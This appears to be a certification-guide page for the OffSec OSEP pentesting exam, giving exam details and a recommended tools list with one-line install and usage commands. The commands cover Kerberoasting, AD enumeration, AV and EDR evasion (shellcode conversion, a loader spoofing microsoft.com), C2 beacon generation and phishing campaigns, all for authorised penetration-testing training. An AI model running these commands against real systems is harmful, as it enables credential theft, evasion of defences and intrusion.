OSEP
OffSec

Offensive Security Experienced Pentester

Expert 48hr practical exam + report Pass: 100+ points $1,499

Advanced evasion, custom exploits, AD attacks. Continuation of OSCP.

Official Page
IssuerOffSec
Format48hr practical exam + report
Duration72 hours total
Pass Score100+ points
Valid For3y
Overview Syllabus (7) Tools (7) Cheat Sheets (2) Labs (1)
Recommended Tools
CrackMapExec Essential
Active Directory

Swiss army knife for AD pentesting

installpip3 install crackmapexec
usagecme smb 10.10.10.0/24 -u user -p pass -M spider_plus
PowerView Essential
Active Directory

PowerShell AD enumeration toolkit

installImport-Module PowerView.ps1
usageGet-DomainUser -SPN; Get-DomainComputer -Unconstrained
Rubeus Essential
Active Directory

Kerberos interaction and abuse toolset

installBuild from source or prebuilt
usageRubeus.exe kerberoast /outfile:hashes.txt
Donut Essential
AV Evasion

Converts .NET/PE to position-independent shellcode

installpip3 install donut-shellcode
usagedonut -f 1 -a 2 -o shellcode.bin Rubeus.exe
ScareCrow Essential
AV Evasion

EDR bypass payload framework

installgit clone https://github.com/optiv/ScareCrow
usageScareCrow -I shellcode.bin -Loader binary -domain microsoft.com
ThreatCheck Essential
AV Evasion

Identifies AV-triggering bytes in binaries

installgit clone https://github.com/rasta-mouse/ThreatCheck && dotnet build
usageThreatCheck.exe -f beacon.exe -e Defender
Cobalt Strike Essential
C2 Frameworks

Industry-standard C2 for adversary simulation

installLicensed from HelpSystems
usageteamserver 10.10.14.x pass profile.c2; connect via client
Sliver Essential
C2 Frameworks

Open-source cross-platform C2 framework

installgo install github.com/BishopFox/sliver/client@latest
usagesliver-server; generate --http 10.10.14.x --os windows -o beacon.exe
Certify Essential
Evasion

AD CS certificate abuse tool

installBuild from source
usageCertify.exe find /vulnerable
Evil-WinRM Essential
Lateral Movement

WinRM exploitation shell

installgem install evil-winrm
usageevil-winrm -i target -u user -p pass -s /path/to/scripts
PowerUpSQL Essential
MSSQL

PowerShell MSSQL attack toolkit

installImport-Module PowerUpSQL.ps1
usageGet-SQLInstanceDomain | Get-SQLServerInfo -Verbose
GoPhish
Phishing

Open-source phishing framework

installgo install github.com/gophish/gophish@latest
usage./gophish; manage campaigns at https://localhost:3333